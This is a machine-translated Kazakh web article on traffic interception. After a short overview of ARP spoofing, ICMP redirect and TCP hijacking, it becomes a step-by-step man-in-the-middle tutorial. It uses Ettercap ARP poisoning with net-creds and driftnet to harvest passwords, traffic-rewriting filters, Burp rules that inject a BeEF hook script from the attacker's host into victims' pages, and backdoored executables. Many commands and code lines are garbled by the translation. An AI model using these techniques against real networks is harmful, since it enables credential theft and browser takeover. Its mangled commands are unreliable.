үй › Орнату және конфигурациялау › Хакерлер оны трафикті қайта бағыттау үшін пайдаланады. Хакерлер шабуылының әдістері. Burp көмегімен деректер спуфингі

Хакерлер оны трафикті қайта бағыттау үшін пайдаланады. Хакерлер шабуылының әдістері. Burp көмегімен деректер спуфингі

Желілік трафикті ұстау әдістері

Желілік анализатор бағдарламалары арқылы желіні тыңдау бірінші, ең көп қарапайым түрдедеректерді ұстап алу.

Желіні тыңдаудан қорғау үшін пайдаланыңыз арнайы бағдарламалар, мысалы, желілік трафикті тыңдайтын желідегі компьютерлерді анықтауға қабілетті AntiSniff.

Өз мәселелерін шешу үшін антисниферлік бағдарламалар желіде тыңдау құрылғыларының бар екендігінің арнайы белгісін пайдаланады - снайферлік компьютердің желілік картасы арнайы тыңдау режимінде болуы керек. Тыңдау режимінде желілік компьютерлер сыналатын хостқа жіберілген IP датаграммаларына ерекше түрде әрекет етеді. Мысалы, тыңдаушы хосттар әдетте хост мекенжайына жіберілген датаграммаларды ғана емес, барлық кіріс трафикті өңдейді. AntiSniff тани алатын күдікті хост әрекетін көрсететін басқа белгілер бар.

Сөзсіз, тыңдау шабуылдаушы тұрғысынан өте пайдалы, өйткені ол көптеген пайдалы ақпаратты алуға мүмкіндік береді - желі арқылы берілетін парольдер, желілік компьютерлердің мекенжайлары, құпия деректер, хаттар және т.б. Дегенмен, қарапайым тыңдау хакерге деректерді өзгерту және бұзу үшін екі хост арасындағы желілік байланысқа кедергі келтіруге мүмкіндік бермейді. Мұндай мәселені шешу үшін күрделірек технология қажет.

Күріш. 1 жалған ARP сұраулары

А және В хосттары арасындағы желілік коммуникацияларды тоқтату үшін хакер ARP қалай пайдалана алатынын көрейік.

А және В хосттары арасындағы желілік трафикті тоқтату үшін хакер өзінің IP мекенжайын осы хосттарға жүктейді, осылайша А және В хабар алмасу кезінде осы жалған IP мекенжайын пайдаланады. Өзінің IP мекенжайын енгізу үшін хакер келесі әрекеттерді орындайды.

Шабуылдаушы A және B хосттарының MAC мекенжайларын анықтайды, мысалы, W2RK бумасындағы nbtstat пәрменін пайдаланады.
Шабуылдаушы A және B хосттарының анықталған MAC мекенжайларына хабарламалар жібереді, олар компьютерлердің MAC мекенжайларына хосттардың IP мекенжайларын шешуге арналған сұрауларға жалған ARP жауаптары болып табылады. А хостына В хостының IP мекенжайы шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіні туралы хабарланады; В хостына А хостының IP мекенжайы шабуылдаушы компьютерінің MAC мекенжайына да сәйкес келетіні туралы хабарланады.
А және В хосттары қабылданған MAC мекенжайларын өздерінің ARP кэштерінде сақтайды, содан кейін оларды бір-біріне хабарламалар жіберу үшін пайдаланады. А және В IP мекенжайлары шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіндіктен, А және В хосттары өз хабарламаларымен кез келген нәрсені жасай алатын делдал арқылы байланысады.

UNIX желілерінде жалған ARP сұрау шабуылының бұл түрі желілік трафикті бақылауға және басқаруға арналған жүйелік утилиталардың көмегімен жүзеге асырылуы мүмкін, мысалы, arpredirect. Өкінішке орай, мұндай сенімді утилиталар Windows желілерінде жүзеге асырылмаған сияқты. Мысалы, NTsecurity веб-сайтында желілік хосттар арасындағы трафикті қайта бағыттау құралы ретінде ұсынылған GrabitAII утилитасын жүктеп алуға болады. Дегенмен, GrabitAII утилитасының функционалдығын негізгі тексеру оның функцияларын жүзеге асыруда толық табыс әлі де алыс екенін көрсетеді.

Желілік трафикті тоқтату үшін шабуылдаушы желілік маршрутизатордың нақты IP мекенжайын өзінің IP мекенжайымен бұрмалауы мүмкін, мұны мысалы, жалған ICMP Redirect хабарламаларын пайдалана отырып. A хосты, RFC-1122 сәйкес, қабылданған Қайта бағыттау хабарламасын басқа хостқа жіберілген датаграммаға жауап ретінде қабылдауы керек, мысалы, B. А хосты Redirect хабарламасындағы өзінің әрекеттерін қабылданған Қайта бағыттау хабарының мазмұнына қарай анықтайды, және егер датаграмманы қайта бағыттау жаңа маршрут бойынша А-дан В-ге қайта бағыттау ішінде көрсетілсе, дәл осылай A хосты орындалады.

Күріш. 2 Жалған бағыттау

Жалған бағыттауды орындау үшін шабуылдаушы ұйым туралы кейбір мәліметтерді білуі керек жергілікті желі, онда A хосты орналасқан, атап айтқанда, трафик А хостынан В хостына жіберілетін маршрутизатордың IP мекенжайы. Бұны біле отырып, шабуылдаушы IP датаграммасын жасайды, онда жіберушінің IP мекенжайы маршрутизатордың IP мекенжайы ретінде анықталады. мекенжайы, ал алушы А хосты көрсетіледі. Сондай-ақ, датаграммаға жаңа маршрутизатордың мекенжай өрісі шабуылдаушы компьютерінің IP мекенжайына орнатылған ICMP Redirect хабарламасы кіреді. Мұндай хабарламаны алғаннан кейін А хосты барлық хабарламаларды шабуылдаушы компьютерінің IP мекенжайына жібереді.

Мұндай шабуылдан қорғау үшін A хостында ICMP Redirect хабарламаларын өңдеуді өшіру керек (мысалы, желіаралық қалқанды пайдалану) және tracert командасы (Unix-те бұл tracerout пәрмені) шабуылдаушы компьютерінің IP мекенжайын аша алады. . Бұл утилиталар жергілікті желіде пайда болған, орнату кезінде қарастырылмаған қосымша маршрутты таба алады, егер, әрине, желі әкімшісі қырағы болмаса.

Ұстаудың жоғарыда келтірілген мысалдары (шабуылдаушылардың мүмкіндіктері шектеулі емес) егер деректерде құпия ақпарат болса, желі арқылы берілетін деректерді қорғау қажеттілігіне сендіреді. Желілік трафикті ұстап қалудан қорғаудың жалғыз әдісі криптографиялық алгоритмдер мен шифрлау хаттамаларын жүзеге асыратын және құпия ақпараттың ашылуы мен ауыстырылуына жол бермейтін бағдарламаларды пайдалану болып табылады. Мұндай мәселелерді шешу үшін криптография қауіпсіз хаттамалар арқылы жіберілген хабарламаларды шифрлау, қол қою және түпнұсқалығын тексеру құралдарын ұсынады.

Ақпарат алмасуды қорғаудың барлық криптографиялық әдістерін іс жүзінде жүзеге асырумен қамтамасыз етілген VPN желілері(Virtual Private Network - Virtual Private Networks).

TCP қосылымын тоқтату

Ең күрделі желілік трафикті тоқтату шабуылы TCP қосылымын басып алу (TCP ұрлау) деп қарастырылуы керек, бұл кезде хакер шабуыл жасалған хостқа TCP пакеттерін жасау және жіберу арқылы хостпен ағымдағы байланыс сеансын үзеді. Әрі қарай, TCP протоколының үзілген TCP қосылымын қалпына келтіру мүмкіндігін пайдалана отырып, хакер үзілген байланыс сеансын ұстап алады және оны ажыратылған клиенттің орнына жалғастырады.

TCP протоколы (Transmission Control Protocol) негізгі тасымалдау протоколдарының бірі болып табылады. OSI деңгейі, виртуалды байланыс арнасы арқылы логикалық байланыстарды орнатуға мүмкіндік береді. Бұл арна арқылы пакеттер жіберіледі және қабылданады, олардың реттілігі жазылады, пакеттер ағыны бақыланады, бұрмаланған пакеттерді қайта жіберу ұйымдастырылады, сессияның соңында байланыс арнасы бұзылады. TCP жалғыз протокол болып табылады негізгі протоколЖетілдірілген хабарды анықтау және қосылу жүйесі бар TCP/IP тобынан.

Бағдарламалық қамтамасыз ету пакетінің снайферлеріне шолу

Барлық бағдарламалық жасақтамалық снайферлерді екі санатқа бөлуге болады: іске қосуды қолдайтын снайферлер пәрмен жолы, және графикалық интерфейспен иіскейді. Дегенмен, біз осы екі мүмкіндікті біріктіретін иісшілер бар екенін ескереміз. Сонымен қатар, снайферлер бір-бірінен қолдайтын протоколдарымен, ұсталған пакеттерді талдау тереңдігімен, сүзгілерді конфигурациялау мүмкіндігімен және басқа бағдарламалармен үйлесімділік мүмкіндігімен ерекшеленеді.

Әдетте, кез келген снифердің терезесі графикалық интерфейсүш облыстан тұрады. Олардың біріншісі ұсталған пакеттердің жиынтық деректерін көрсетеді. Әдетте бұл аймақ өрістердің минимумын көрсетеді, атап айтқанда: пакетті ұстап алу уақыты; Пакетті жіберуші мен алушының IP мекенжайлары; Пакет жіберуші мен алушының MAC мекенжайлары, бастапқы және тағайындалған порт мекенжайлары; протокол түрі (желі, көлік немесе қолданбалы деңгей); ұсталған деректер туралы кейбір жиынтық ақпарат. Екінші аймақ жеке таңдалған бума туралы статистикалық ақпаратты көрсетеді, ал соңында үшінші аймақ буманы он алтылық немесе ASCII таңбалы пішінде көрсетеді.

Барлық дерлік пакеттік снайферлер декодталған пакеттерді талдауға мүмкіндік береді (сондықтан дестелік снайферлер пакеттік анализаторлар немесе протокол анализаторлары деп те аталады). Снайфтер ұсталған пакеттерді қабаттар мен хаттамалар бойынша таратады. Кейбір пакеттік снайферлер протоколды тануға және түсірілген ақпаратты көрсетуге қабілетті. Ақпараттың бұл түрі әдетте снайфтер терезесінің екінші аймағында көрсетіледі. Мысалы, кез келген снайферлер TCP протоколын тани алады және кеңейтілген сканерлер бұл трафикті қай қолданба жасағанын анықтай алады. Көптеген протокол анализаторлары 500-ден астам әртүрлі хаттамаларды таниды және оларды аты бойынша сипаттап, декодтай алады. Снайфер экранда шифрды ашып, көрсете алатын ақпарат неғұрлым көп болса, соғұрлым қолмен декодтау қажет болады.

Пакеттік снайферлер кездесуі мүмкін мәселенің бірі әдепкі порттан басқа портты пайдаланып протоколды дұрыс анықтау мүмкін еместігі болып табылады. Мысалы, қауіпсіздікті жақсарту үшін кейбір белгілі қолданбалар әдепкі порттардан басқа порттарды пайдалану үшін конфигурациялануы мүмкін. Сонымен, веб-сервер үшін сақталған дәстүрлі порт 80 орнына, бұл серверОны 8088 немесе кез келген басқа портқа күштеп қайта конфигурациялауға болады. Бұл жағдайда кейбір пакеттік анализаторлар хаттаманы дұрыс анықтай алмайды және тек төменгі деңгейдегі протокол (TCP немесе UDP) туралы ақпаратты көрсете алмайды.

Плагиндер немесе кірістірілген модульдер ретінде бағдарламалық жасақтаманың аналитикалық модульдерімен бірге жеткізілетін бағдарламалық құралды сканерлеушілер бар, олар ұсталған трафик туралы пайдалы аналитикалық ақпараты бар есептерді жасауға мүмкіндік береді.

Бағдарламалық пакеттік анализаторлардың көпшілігінің тағы бір тән ерекшелігі трафик түсірілгенге дейін және кейін сүзгілерді конфигурациялау мүмкіндігі болып табылады. Сүзгілер жалпы трафиктен белгілі бір дестелерді берілген критерий бойынша таңдайды, бұл трафикті талдау кезінде қажет емес ақпараттан арылуға мүмкіндік береді.

Ettercap баламалары

Ettercap - бұл ортадағы адам шабуылының ең танымал бағдарламалық құралы, бірақ ол ең жақсысы ма? Бүкіл нұсқаулықтарда сіз Ettercap ешқашан дерлік жалғыз пайдаланылмайтынын, сол немесе басқа бағдарлама әрқашан трафикті өңдеу тізбегінде онымен құрастырылғанын көресіз. Мүмкін, бұл икемділік қосады; жалпы алғанда, бұл тәсіл UNIX негізі болып табылады - бір бағдарлама бір тапсырманы орындайды, ал соңғы пайдаланушы қажетті нәтижеге жету үшін әртүрлі бағдарламаларды біріктіреді. Бұл тәсілмен бағдарлама кодын сақтау оңайырақ, мұндай миниатюралық «кірпіштерден» сіз кез келген күрделілік пен икемділік жүйесін құра аласыз. Дегенмен, әр түрлі тапсырмалары бар бес ашық консольдің болуы, олардың жұмысы бір нәтижеге жетуге бағытталған бағдарламалар өте ыңғайлы емес, бұл жай ғана күрделірек, қандай да бір кезеңде қате жіберу мүмкіндігі бар және барлық конфигурацияланған жүйе бекер жұмыс істейді.

Net-Creds иісі:

Барған URL мекенжайлары
POST сұраулары жіберілді
HTTP пішіндеріндегі логиндер/парольдер
негізгі HTTP аутентификациясына арналған логиндер/парольдер
HTTP іздеулері
FTP логиндері/парольдері
IRC логиндері/парольдері
POP логиндері/парольдері
IMAP логиндері/құпиясөздері
Telnet логиндері/парольдері
SMTP логиндері/парольдері
SNMP қауымдастық жолы
HTTP, SMB, LDAP және т.б. сияқты барлық қолдау көрсетілетін NTLMv1/v2 протоколдары.
Керберос

Ұсталғандардың жақсы таңдауы және driftnet осыған байланысты қарапайым - ол тек ұсталған кескіндерді көрсетеді.

Құрылғыны қайта жіберу режиміне ауыстырыңыз.

"1" жаңғырығы > /proc/sys/net/ipv4/ip_forward

Ettercap графикалық интерфейсімен (-G) іске қосыңыз:

Ettercap-G

Енді Хосттарды таңдаңыз, Хосттарды сканерлеу ішкі тармағы бар. Сканерлеу аяқталғаннан кейін Хосттар тізімін таңдаңыз:

Target1 ретінде маршрутизаторды таңдаңыз (1-мақсатқа қосу), Мақсат2 ретінде сіз шабуыл жасайтын құрылғыны таңдаңыз (2-мақсатқа қосу).

Бірақ мұнда бірінші кедергі туындауы мүмкін, әсіресе хосттар көп болса. Әртүрлі нұсқауларда, соның ішінде жоғарыда ұсынылған бейнеде, авторлар мақсатты құрылғыға көтеріледі (әркімде қандай да бір себептермен Windows бар) және пәрменді қолдана отырып, олар жергілікті желідегі осы машинаның IP-ін қарайды. Келісіңіз, бұл опция нақты жағдайлар үшін қолайсыз.

арқылы сканерлесеңіз, біразын алуға болады Қосымша Ақпаратхосттар туралы, дәлірек айтқанда, желілік карта өндірушісі туралы:

Nmap -sn 192.168.1.0/24

Егер деректер әлі де жеткіліксіз болса, ОЖ анықтау үшін сканерлеуді орындауға болады:

Nmap -O 192.168.1.0/24

Көріп отырғанымыздай, IP 192.168.1.33 бар машина Windows болып шықты, егер бұл жоғарыдан келген белгі болмаса, онда бұл не? 😉 ЛОЛ

Бұл біз екінші мақсат ретінде қосамыз.

Енді Mitm мәзір элементіне өтіңіз. Онда ARP улану тармағын таңдаңыз... Қашықтағы қосылымдарды Sniff үшін құсбелгіні қойыңыз.

Біз егін жинауды бастаймыз, бір терезеде біз іске қосамыз

Таза несиелер

басқасында (екі бағдарламаны да опциясыз іске қосуға болады)

Driftnet

Деректер жинау бірден басталды:

Оң жақта driftnet басқа терезені ашты, онда ол ұсталған суреттерді көрсетеді. Net-creds терезесінде біз кірген сайттарды және ұсталған құпия сөздерді көреміз:

1.2 Ettercap + Burp Suite
3. Ettercap қолданбасында деректерді (барған сайттар мен алынған құпия сөздер) қараңыз

«Көру» мәзірінде «Қосылымдар» және «Профильдер» қойындыларына кіру мүмкіндігі бар. Сондай-ақ, IP мекенжайларын шешу жолағын белгілеуге болады. Қосылымдар, әрине, байланыстар. Ettercap ашқан әрбір хост үшін жадқа профильдерді жинайды. Онда пайдаланушылар мен парольдер жиналады. Бұл жағдайда түсірілген тіркелгі деректері (құпия сөздер) бар профильдер крестпен белгіленеді:

Профильдерге тым көп сенудің қажеті жоқ - мысалы, FTP және басқа қызметтер үшін ұсталған логиндер мен парольдер белгіленген, олар үшін бағдарлама тіркелгі деректері ретінде алынған ақпаратты анық түсіндіре алады. Бұған, мысалы, негізгі аутентификация деректері, веб-пішіндерге енгізілген логиндер мен құпия сөздер кірмейді.

Қосылымдарда ең перспективалы деректер жұлдызшамен белгіленеді:

Мәліметтерді көру үшін осы жазбаларды екі рет басуға болады:

Бүкіл тізімде бұл жұлдыздарды іздемеу үшін осы өріс бойынша сұрыптауға болады және олардың барлығы жоғарғы немесе төменгі жағында пайда болады:

Негізгі аутентификация ұсталды:

Яндекс үшін логин-пароль (төменде белгіленген):

Бұл ВКонтакте үшін ұсталған тіркелгі деректері:

Сондай-ақ, ең қызықты деректер төменгі консольде жиналады:

Бағдарламаның нәтижелерін сақтағыңыз келсе, осы опцияларды пайдаланыңыз (Ettercap іске қосу кезінде пернелерді көрсетіңіз:

Тіркеу опциялары: -w, --жазылған деректерді pcapfile-ге жазу -L, --log барлық трафикті осыған жазу -l, --log-info осыған тек пассивті ақпаратты жазу -m, --log-msg барлық хабарламаларды жазу бұл -c, --compress ішінде журнал файлдары үшін gzip қысуын пайдаланыңыз

4. Ettercap бағдарламасында деректерді жылдам ауыстыру
4.1 Ettercap пайдаланушы сүзгілерін пайдалану

Ескерту: Барлық сынақтарға қарамастан, Ettercap сүзгілері мен үшін әлі жұмыс істемеді. Бұл қолдар мәселесі, аппараттық құрал мүмкіндіктері немесе бағдарламаның өзіндегі қате екенін түсіну қиын... Бірақ 0.8.2 нұсқасы (қазіргі уақытта ең соңғысы) үшін сүзгілердің ақаулары туралы қате туралы есеп бар. Жалпы, қателер туралы есептерге және форумдарға қарағанда, сүзгілер жиі түсіп қалады немесе ұзақ уақыт бойы жұмыс істемейді. 5 ай бұрын өзгертулер енгізілген филиал бар https://github.com/Ettercap/ettercap/tree/filter-improvements, яғни. сүзгі жақсартулары (сүзгі жақсартуларымен). Бұл филиал үшін де, репозиторийден алынған нұсқа үшін де әртүрлі сынақтар жасалды, әртүрлі сүзгілер әртүрлі жағдайларда сынақтан өтті, көп уақыт жұмсалды, бірақ нәтиже болмады. Айтпақшы, Kali Linux жүйесінде сүзгіні жақсарту нұсқасын орнату үшін мынаны орындау керек:

Sudo apt-get жою ettercap-графикалық ettercap-common sudo apt-get орнату git debhelper bison тексеру cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libluajit-5.1-lib1vnvde libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap build/cddfcs build_dmk =Қосулы ../ sudo make install орнатыңыз

Жалпы, сүзгілеріңіз жұмыс істемесе, сіз жалғыз емессіз. Ettercap туралы нұсқауларда мен сүзгілер тақырыбын өткізіп жібере алмаймын, сондықтан олар кез келген жағдайда талқыланады.

Осы уақытқа дейін біз ARP жалғандығы үшін Ettercap қолданып келдік. Бұл өте үстірт қолданба. Теңшелетін сүзгілердің арқасында біз трафикті жылдам өзгерте аламыз. Сүзгілер бөлек файлдарда болуы керек және оларды қолданар алдында Etterfilter бағдарламасы арқылы құрастыру керек. Сілтеме берілген құжаттама аз болып көрінсе де, бірақ төменде келтірілген мысалдармен бірге ол сізге өте қызықты сүзгілерді жазуға мүмкіндік береді.

Бірінші фильтрімізді жасайық, ол барлық кескіндерді мынамен ауыстырады:

img_replacer.filter деп аталатын файлда көшіру:

Егер (ip.proto == TCP && tcp.dst == 80) ( егер (іздеу(DATA.data, "Қабылдау-кодтау"))) ( ауыстырыңыз("Қабылдау-кодтау", "Қабылдау-қоқыс!"); # Ескертпе: ауыстыру жолы бастапқы хабармен бірдей ұзындықта ("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=") , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); ауыстырыңыз("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); ауыстыру("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); ауыстыру("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Сүзгі орындалды.\n"); )

Файлды құрастырыңыз:

Etterfilter img_replacer.filter -o img_replacer.ef

Құрастыру нәтижелері:

Etterfilter 0.8.2 авторлық құқық 2001-2015 Ettercap әзірлеу тобы 14 хаттамалық кестелер жүктелді: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr және 13 тұрақты мәндер жүктелді: VRRP OSPF ESPMP GRE UDP IPCP6 IPPPing IPPPing файл "img_replacer.filter" аяқталды. Мета-ағашты ашу аяқталды. Белгілерді нақты ығыстыруға түрлендіру аяқталды. "img_replacer.ef" файлына шығуды жазу аяқталды. -> 18 нұсқауға кодталған сценарий.

-F қосқышы бағдарламаға қосқыштан кейінгі файлдан сүзгіні жүктеуді айтады. Компиляциядан кейін сүзгісі бар жаңа файлымыздың атауы img_replacer.ef болып табылады, сондықтан пәрмен келесі пішінді алады:

Ettercap -G -F img_replacer.ef

Ескертпе: Веб-трафикті бақылаған кезде, сіз көретін пакеттер шифрланған пішінде болуы мүмкін. Үшін тиімді жұмыссүзгілер, Ettercap пішіндегі трафикті қажет етеді кәдімгі мәтін. Кейбір бақылауларға сәйкес, веб-беттер қолданатын кодтау түрі «Қабылдау-кодтау: gzip, deflate»

Төменде кәдімгі мәтін түрінде байланысты мәжбүрлеп, кодтауды қайта жазатын сүзгі берілген:

Егер (ip.proto == TCP && tcp.dst == 80) ( егер (search(DATA.data, "gzip"))) ( replace("gzip", " "); # ескертпе: ауыстырылған жолда төрт бос орын msg ("ақталған gzip\n"); ) ) егер (ip.proto == TCP && tcp.dst == 80) ( егер (іздеу(DATA.data, "deflate"))) ( ауыстырыңыз("deflate", " "); # ескертпе: ауыстырылған жолда жеті бос орын msg("ақталған деflate\n"); ) )

Сүзгілерді жазу синтаксисі егжей-тегжейлі сипатталған, содан кейін тағы бірнеше мысалдар бар:

# пакеттегі мәтінді ауыстыру: егер (ip.proto == TCP && іздеу(DATA.data, "lol"))( replace("lol", "smh"); msg("сүзгі орындалды"); ) # көрсету хабар , егер tcp порты 22 болса if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH пакеті\n"); ) ) # жазып алыңыз бүкіл telnet трафигі, сондай-ақ әрбір пакет үшін ./program орындаңыз if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./)" logfile.log "); exec("./program"); ) ) # егер http (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) қоспағанда, барлық трафикті тіркеу (DATA.data , "./logfile.log"); ) # пакеттік пайдалы жүктемедегі кейбір әрекеттер, егер (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) басқа ( DATA.data = " өзгертілген"; DATA .data + 20 = 0x4445; ) # "ettercap" бар барлық пакеттерді тастаңыз if (іздеу(DECODED.data, "ettercap")) ( msg("біреу біз туралы айтып жатыр...\n") ; drop( ); kill(); ) # if (ip.proto == TCP) ( if (tcp.src == 22 ||) тұрақты өрнекке сәйкес келетін шифры шешілген ssh пакеттерін жазу tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # жою пакеттері, егер (ip.ttl).< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Burp көмегімен деректерді ауыстыру

Біз Ettercap және Burp-ті 1.2-тармақта немесе 2.2-тармақта сипатталғандай іске қосамыз.

Burp ішінде Прокси -> Параметрлер тармағына өтіңіз. Біз сол жерден Сәйкестендіру және ауыстыруды табамыз. Жаңа ереже қосу үшін Қосу түймесін басыңыз.

Сұраныс тақырыбы - сұрау тақырыбы
Сұраныс органы – сұрау органы
Жауап тақырыбы - жауап тақырыбы
Жауап беру органы – жауап денесі
Параметр атауын сұрау - Сұраныс параметрінің атауы
Параметр мәнін сұрау - параметр мәнін сұрау
Сұраныс бірінші жолы - сұраудың бірінші жолы

GET әдісімен берілетін деректерді өзгерту қажет болса, бұл тақырыптарға қатысты.

HTML белгілеуінде head (head тегі) сияқты нәрсе де бар. Жоғарыда аталғандардың бұл тақырыпқа еш қатысы жоқ. Сәл жоғарырақ біз пакет тақырыптары туралы айтамыз. Мазмұнды өзгерткіңіз келсе HTML беттері, содан кейін бас тегтің (мысалы, тақырып) мазмұнын өзгерткіңіз келсе де, Сұраныс тақырыбының орнына әрқашан Жауап мәтінін таңдауыңыз керек.

Егер сіз таныс болмасаңыз тұрақты тіркестер, содан кейін, негізінен, алаңдайтын ештеңе жоқ: HTML көп нәрсені кешіреді, ал түсінбейтін нәрсені елемейді - сіз оны пайдалана аласыз. Тұрақты тіркестерді қолдануды білсеңіз, мен сізді құрметтеймін.)))

Мысалы, Сұраныс тақырыбын Жауап мәтініне өзгертіп, жаңа ережені жасайық. Ереженің өзінде біз өзгереміз

Тақырып жоқ

Regex сәйкестік ұяшығын белгілеңіз.

Енді барлық сайттарда (HTTPS жоқ) тақырып Тақырыпсыз болады:

Негізгі тегтен кейін ерікті жолды енгізіңіз (ол мәтіндегі бірінші жол болады). Сұраныс тақырыбы Жауап мәтініне өзгертілді. Біз өзгереміз

Regex сәйкестік ұяшығын белгілеңіз.

Жоғарғы оң жақ бұрышта (орналасуға байланысты) «Мен жақсымын!» деген жазу пайда болады. Сіз CSS, JavaScript кодын, кез келген мәтінді - кез келген нәрсені кірістіре аласыз. Сіз негізінен парақтан бәрін алып тастай аласыз, содан кейін оны өзіңіздің мазмұныңызбен толтыра аласыз - бәрі сіздің қиялыңызға байланысты.

Идея деректер бастапқы серверге және шабуылдаушы серверіне жіберілетін етіп әрбір пішінді сәл өзгерту болды (әр пішін үшін көп жіберуді жүзеге асыру). Бірақ егер жіберілген деректер шифрланбаған болса және біз оған қол жеткізе алатын болсақ, біз оны көріп отырмыз, оны кез келген серверге жіберудің қажеті жоқ деп есептейміз. Дегенмен, біреуге деректерді бір пішіннен бірден бірнеше серверге жіберудің шынымен жұмыс істейтін мысалы қажет болса.

5. BeEF-ге қосылу

BeEF мүмкіндіктерін пайдалануды бастау үшін HTML кодына JavaScript файлын ендіру керек, әдетте келесідей жол:

Келесі екі әдіс тек осы жолды ендіру әдісімен ерекшеленеді.

5.1 Ettercap сүзгілері арқылы BeEF қосу

[бөлім кейінірек дайындалады]

5.2 BeEF-ті Burp арқылы қосу

Сіз дәл 4.2-тармақта жазылғандай бастауыңыз керек. Тек тақырыптарды ауыстырудың және сайтқа мәтін қосудың орнына біз JavaScript кодын жол түрінде енгіземіз:

Менің жағдайда бұл файл 3000 портында IP 192.168.1.36 қол жетімді. Файл hook.js деп аталады (параметрлерде өзгертуге болады). Анау. менің жағдайда сызықты енгізу керек:

Мұны, мысалы, жаңа ереже жасау, Сұраныс тақырыбын Жауап мәтініне өзгерту арқылы жасауға болады. Ауыстыру HTML кодының өзінде болуы керек

Өте жақсы, HTTPS жоқ кез келген веб-сайтты ашқанда, JavaScript коды HTML кодына енгізіледі, ол сізге қосылған браузер арқылы ақпаратты жинауға және әртүрлі шабуылдарды жасауға мүмкіндік береді:

6. Бэкдорлармен инфекция

Орындалатын файлдарды Ettercap сүзгілерінің екеуін де [белгілі бір себептермен енді жұмыс істемейтін] және пайдалану арқылы ауыстыруға және жұқтыруға болады. үшінші тарап қолданбалары. Мысалы, BDFProxy мұны жылдам орындай алады. Өкінішке орай, BDFProxy 2016 жылдың сәуір айындағы Backdoor Factory жаңартуынан әлі де өзгермейді: libmproxy бумасы Python тілінде mitmproxy деп өзгертілді. BDFProxy үшін libmproxy бумасы қажетті тәуелділік болып табылады; бұл бумасыз бағдарлама іске қосылмайды. Сондықтан, қазір, BDFProxy «жөндеу» алдында оны пайдалану мүмкін емес, өйткені Backdoor Factory орнатылған болса да, BDFProxy бағдарламасы libmproxy кітапханасының жоқтығына шағымданады...

Ұқсас операцияны Burp Suite арқылы жасауға болады. Қадамдық алгоритм ұсынылған, оны осы бөлімде қайта жазудың мағынасы жоқ.

7. Ettercap плагиндерін пайдалану

Ettercap плагиндері туралы ақпаратты табуға болады. Плагиндер өте көп, төменде сипатталғандар маған ең қызықты болып көрінеді.

Плагиндерді Ettercap іске қосылған кезде қосуға болады, бұл үшін опция бар:

P, --plugin оны іске қосыңыз

Плагиндерді графикалық интерфейстен де жүктеуге болады:

[МАТЕРИАЛ ДАЙЫНДАЛУДА]

7.1 arp_cop

Ол ARP сұрауларын/жауаптарын пассивті бақылау арқылы күдікті ARP әрекетін хабарлайды. Ол ARP улану әрекеттері немесе қарапайым IP қақтығыстары немесе IP өзгерістері туралы хабарлай алады. Егер сіз хосттардың бастапқы тізімін жасап жатсаңыз, плагин дәлірек жұмыс істейді.

Ettercap -TQP arp_cop //

ARP жалғандығын нақты анықтау мысалы:

Кеңейту

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mial үшін құпия сөз: ettercap 0.8.2 авторлық құқық 2001-2015 Ettercap әзірлеу тобы Тыңдау күні: eth0 -> 08:00:27:A3:08:4A 192.16/. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL диссекциясы etter.conf файлында жарамды "redir_command_on" сценарийін қажет етеді Артықшылықтар EUID 65534 EGID 65534... ажыратылған жеткізуші саусақ ізі 1766 tcp ОЖ саусақ ізі 2182 белгілі қызметтер Сканерлеу үшін 255 хостты рандомизациялау... 255 хост үшін бүкіл желі маскасын сканерлеу... * |====== =============== =============================>| 100,00 % Хосттар тізіміне 3 хост қосылды... Бірыңғай иіскеу басталуда... Тек мәтіндік интерфейс іске қосылды... Кірістірілген анықтама үшін «h» түймесін басыңыз arp_cop плагинін іске қосу... arp_cop: плагин іске қосылды... arp_cop: (жаңа хост ) 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.35 192.168.1.35 болып көрінеді (arp_cop.18W.) (arp_cop.) 5 192.168.1.1 arp_cop болып көрінеді: 